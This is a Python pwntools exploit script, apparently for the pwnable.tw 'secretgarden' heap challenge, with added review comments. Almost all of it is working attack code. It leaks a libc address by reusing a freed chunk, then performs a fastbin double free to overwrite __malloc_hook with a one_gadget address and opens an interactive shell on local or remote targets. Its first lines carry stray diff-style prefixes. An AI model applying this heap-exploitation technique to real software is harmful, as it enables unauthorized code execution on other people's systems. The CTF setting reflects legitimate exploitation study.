- import sys
- import time
- from pwn import *
# Environment for the local run: preload the bundled libc so that every
# libc offset used later in this script refers to this exact file.
env = dict(LD_PRELOAD="./libc_64.so.6")
glibc = ELF("./libc_64.so.6")
# NOTE(review): the script loads libc_64.so.6 and packs/unpacks 64-bit
# values with p64/u64, yet declares arch='i386' — confirm whether 'amd64'
# was intended; with explicit p64/u64 the setting does not change the run.
context(os='linux', arch='i386', log_level='debug')
# Set to 1 to attach gdb to the local process with the breakpoints below.
GDB = 0
# Breakpoint offsets relative to the PIE image base; two are disabled.
listBp = [
    # 0xE74,
    # 0xF7A,
    0xCD8,
]
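def createGDBScript(listBp, pie=False, pie_base=0x555555554000):
    """Build a gdb command script: one breakpoint per offset, then ``c``.

    Args:
        listBp: iterable of breakpoint addresses; treated as file offsets
            when ``pie`` is set.
        pie: when true, rebase every offset onto ``pie_base``.
        pie_base: image base assumed for a PIE binary. The default is the
            value the original script hard-coded for its no-ASLR local run.

    Returns:
        Script text with one ``b * 0x...`` line per entry followed by a
        ``c`` line, each newline-terminated (``"c\\n"`` for an empty list).
    """
    base = pie_base if pie else 0
    # hex() already returns a str; collect the lines and join once instead
    # of concatenating in a loop.
    lines = ["b * " + hex(a + base) for a in listBp]
    lines.append("c")
    return "\n".join(lines) + "\n"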
# Any command-line argument selects the remote service; otherwise the
# binary is run locally with ASLR off and the bundled libc preloaded so
# that addresses stay stable between runs. ``flag`` records the mode.
if len(sys.argv) > 1:
    flag, r = 1, remote("chall.pwnable.tw", 10203)
else:
    flag, r = 0, process("./secretgarden", aslr=False, env=env)

# Optional debugger attach; breakpoints are rebased for PIE.
if GDB:
    gdb.attach(r, gdbscript=createGDBScript(listBp, pie=True))
def add(length, name, color):
    """Menu option 1: plant a flower with the given name length, name and color.

    The name is sent raw (no trailing newline) so the byte count delivered
    is exactly ``len(name)``; the other two fields are newline-terminated.
    Uses the module-level tube ``r``.
    """
    r.sendline("1")
    for prompt, payload, send in (
        ("Length of the name :", str(length), r.sendlineafter),
        ("The name of flower :", name, r.sendafter),
        ("The color of the flower :", color, r.sendlineafter),
    ):
        send(prompt, payload)
def remove(index):
    """Menu option 3: remove the flower at ``index`` from the garden.

    Uses the module-level tube ``r``; ``index`` is sent as decimal text.
    """
    prompt = "Which flower do you want to remove from the garden:"
    r.sendline("3")
    r.sendlineafter(prompt, str(index))
def main():
    """Drive the challenge menu end to end, then hand the tube to the user.

    Relies on the module-level tube ``r`` and the ``glibc`` ELF. Every
    statement here depends on the heap state left by the previous one, so
    the order must not be changed. The constants 0x3c3c78 and 0xef6c4 are
    offsets into the bundled libc_64.so.6 and are not valid for any other
    libc build.
    """
    # Stage 1 (author's comments below): two 0x100-byte flowers, the first
    # removed, then a slightly smaller request that the author says reuses
    # the first chunk.
    #First Fit Behavior
    add(0x100,"AAAAAAAA","aaaaaaaa")
    add(0x100,"BBBBBBBB","bbbbbbbb")
    remove(0)
    #Free First
    #Malloc now get the pointer of first
    add(0xc8,"x","cccccccc")
    # Menu option 2 lists the garden; the name of flower[2] is read back and
    # interpreted as a libc pointer. The two addresses in the next comments
    # are values the author recorded, not computed here.
    r.sendline("2")
    #0x155555328b20<----Leak
    #0x155554f65000<----Base
    r.recvuntil("Name of the flower[2] :")
    # NOTE(review): calling str.ljust with '\x00' on a recv() result is
    # Python 2 pwntools behaviour; under Python 3 recvuntil returns bytes
    # and this line would raise — confirm the intended interpreter.
    libc=u64(r.recvuntil("\n")[:-1].ljust(8,'\x00'))-0x3c3c78
    glibc.address=libc
    log.success("libc: "+hex(libc))
    log.success("malloc_hook: "+hex(glibc.symbols['__malloc_hook']))
    remove(1)
    remove(2)
    # Offset of the chosen gadget inside the bundled libc (see docstring).
    one_gadget = glibc.address+0xef6c4
    # Menu options 4 and 2; their output is drained with recv() and never
    # checked, so a changed menu would go unnoticed here.
    r.sendline("4")
    r.recv()
    r.sendline("2")
    r.recv()
    #raw_input()
    # Stage 2 (author's comment below): remove indices 0, 1, 0 in that
    # order, then four same-sized allocations. The first of them carries a
    # pointer near __malloc_hook; the last carries 0x13 bytes of padding
    # followed by the gadget address. The meaning of the -0x23 and 0x13
    # constants is not documented on this page — verify against the binary.
    #fastbin double free
    add(0x60,"1"*0x60,"0")
    add(0x60,"2"*0x60,"1")
    remove(0)
    remove(1)
    remove(0)
    add(0x60,p64(glibc.symbols['__malloc_hook']-0x23),"2")
    add(0x60,"3"*0x60,"3")
    add(0x60,"4"*0x60,"4")
    #gdb.attach(r)
    add(0x60,"A"*0x13+p64(one_gadget),'5')
    # The effect of the two trailing remove(0) calls is not stated on this
    # page; confirm against the challenge binary before relying on it.
    remove(0)
    remove(0)
    r.interactive()
# Run main() only when executed directly. Note that the connection (``r``)
# is already opened at module level above, so importing this file still
# connects to or spawns the target.
if __name__ == "__main__":
    main()